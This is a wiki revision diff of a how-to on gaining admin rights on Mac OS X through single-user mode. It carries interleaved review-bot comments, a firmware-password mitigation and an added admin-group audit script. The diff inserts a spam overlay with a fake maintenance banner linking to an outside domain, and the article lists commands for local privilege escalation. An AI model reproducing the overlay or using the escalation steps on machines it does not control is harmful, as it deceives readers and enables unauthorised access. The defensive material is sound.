Difference between revisions of "Escalate Privileges on Mac OS X"

From Secure Computing Wiki
(Lock it Down)
Line 1: Line 1:
 +
----
 +
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
 +
----
 +
=[http://egebyromedu.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
 +
----
 +
=[http://egebyromedu.co.cc CLICK HERE]=
 +
----
 +
</div>
 
This is a rewrite of the article from Hackszine [http://www.hackszine.com/blog/archive/2009/02/gain_admin_rights_in_os_x_leop.html on 2/13/2009].
 
This is a rewrite of the article from Hackszine [http://www.hackszine.com/blog/archive/2009/02/gain_admin_rights_in_os_x_leop.html on 2/13/2009].
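Review bot: the lines added at the top of the page are unrelated to the article and to the "(Lock it Down)" edit summary. They insert a `<div>` with `position: absolute`, a 2000px by 2000px size and a very large `z-index`, containing two external links to egebyromedu.co.cc under a "Page Is Unavailable Due To Site Maintenance" banner, which lays an overlay across the article. This is link-spam defacement: revert the revision and consider adding the linked domain to the wiki's spam blacklist.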
  
Line 5: Line 13:
  
 
== How To ==
 
== How To ==
<ol>
+
&lt;ol>
<li>First, reboot the machine into single-user mode.  Do this by holding the Command-S key combination until the machine has booted.</li>
+
&lt;li>First, reboot the machine into single-user mode.  Do this by holding the Command-S key combination until the machine has booted.&lt;/li>
<li>Once booted, mount the file systems read-write.  Most default-installed Mac OS X systems only have one partition:
+
&lt;li>Once booted, mount the file systems read-write.  Most default-installed Mac OS X systems only have one partition:
<pre>:/ root# mount /</pre></li>
+
&lt;pre>:/ root# mount /&lt;/pre>&lt;/li>
<li>Now. we need to launch directory services.  
+
&lt;li>Now. we need to launch directory services.  
<pre>:/ root# launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist</pre></li>
+
&lt;pre>:/ root# launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist&lt;/pre>&lt;/li>
<li>Add the user to the admin group.   
+
&lt;li>Add the user to the admin group.   
 
To add the group membership to a user, use the following command:
 
To add the group membership to a user, use the following command:
<pre>:/ root# dscl . append groups/admin users <username></pre></li>
+
&lt;pre>:/ root# dscl . append groups/admin users &lt;username>&lt;/pre>&lt;/li>
<li>Using one of the two following commands, verify the user has been added to the admin group:
+
&lt;li>Using one of the two following commands, verify the user has been added to the admin group:
# groups <username> -or-
+
# groups &lt;username> -or-
 
# dscl . read groups/admin users (there is a space on either side of the period)
 
# dscl . read groups/admin users (there is a space on either side of the period)
</li></ol>
+
&lt;/li>&lt;/ol>
  
 
== Lock it Down ==
 
== Lock it Down ==
 
In Mac OS X 10.4 and later, simply setting an Open Firmware, or EFI firmware password will prevent booting into single-user mode without the firmware password.  You can view Apple's Knowledge Base articles here:
 
In Mac OS X 10.4 and later, simply setting an Open Firmware, or EFI firmware password will prevent booting into single-user mode without the firmware password.  You can view Apple's Knowledge Base articles here:
 
* [http://support.apple.com/kb/HT1352 Setting up firmware password protection in Mac OS X]
 
* [http://support.apple.com/kb/HT1352 Setting up firmware password protection in Mac OS X]
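Review bot: in the How To list, the opening `<` of every `<ol>`, `<li>` and `<pre>` tag (and of the `<username>` placeholder) is replaced with `&lt;`, so the tags are displayed as literal text instead of being parsed as a list. The Lock it Down lines that the edit summary names are unchanged in this hunk, so the summary does not describe the edit. Restore the previous markup by reverting the revision.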

Revision as of 21:52, 23 November 2010





This is a rewrite of the article from Hackszine on 2/13/2009.

Introduction

Mac OS X has very few core differences in operation from a standard Unix operating system. In many cases, a trick that works on Linux or FreeBSD will work, with little modification, on Mac OS X. We'll apply this to escalation of privileges. We do this the same way a root password is recovered on Linux or BSD systems.

How To

1. First, reboot the machine into single-user mode. Do this by holding the Command-S key combination until the machine has booted.

2. Once booted, mount the file systems read-write. Most default-installed Mac OS X systems only have one partition:

       :/ root# mount /

3. Now we need to launch directory services.

       :/ root# launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist

4. Add the user to the admin group. To add the group membership to a user, use the following command:

       :/ root# dscl . append groups/admin users <username>

5. Using one of the two following commands, verify the user has been added to the admin group:

       # groups <username>
       -or-
       # dscl . read groups/admin users

   (there is a space on either side of the period)

Lock it Down

In Mac OS X 10.4 and later, simply setting an Open Firmware or EFI firmware password will prevent booting into single-user mode without the firmware password. You can view Apple's Knowledge Base articles here:

* Setting up firmware password protection in Mac OS X: http://support.apple.com/kb/HT1352
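A firmware password blocks the single-user boot, but it does not reveal a machine that was already modified. The following added example (not part of the original article) audits the local admin group against an expected baseline, which is how the group change described in How To would show up afterwards. The allow-list, the account names and the sample output are constructed assumptions; the live query uses `dscl . -read /Groups/admin GroupMembership`.

```shell
#!/bin/sh
# Added example: flag members of the local admin group that are not on an
# expected baseline. Account names and the sample output are constructed.

# unexpected_admins "<dscl output>" "<space-separated allow-list>"
# Prints one unexpected account name per line; prints nothing if all match.
unexpected_admins() {
    dscl_output=$1
    allowed=$2
    # dscl prints "GroupMembership: name1 name2 ..."; drop the key.
    members=${dscl_output#GroupMembership:}
    for m in $members; do
        case " $allowed " in
            *" $m "*) ;;                 # on the baseline
            *) printf '%s\n' "$m" ;;     # not on the baseline
        esac
    done
}

# read_admin_group: live membership on macOS, constructed sample elsewhere.
read_admin_group() {
    if command -v dscl >/dev/null 2>&1; then
        dscl . -read /Groups/admin GroupMembership
    else
        printf 'GroupMembership: root itadmin jdoe\n'   # constructed sample
    fi
}

ALLOWED_ADMINS="root itadmin"    # assumption: the site's approved admins

# audit_admin_group: returns 1 and lists the accounts if any are unexpected.
audit_admin_group() {
    extra=$(unexpected_admins "$(read_admin_group)" "$ALLOWED_ADMINS")
    if [ -n "$extra" ]; then
        printf 'unexpected admin group member: %s\n' $extra
        return 1
    fi
    printf 'admin group matches baseline\n'
}

audit_admin_group || printf 'review the accounts listed above\n'
```

Run it from a scheduled job or management agent and alert on a non-zero result from `audit_admin_group`.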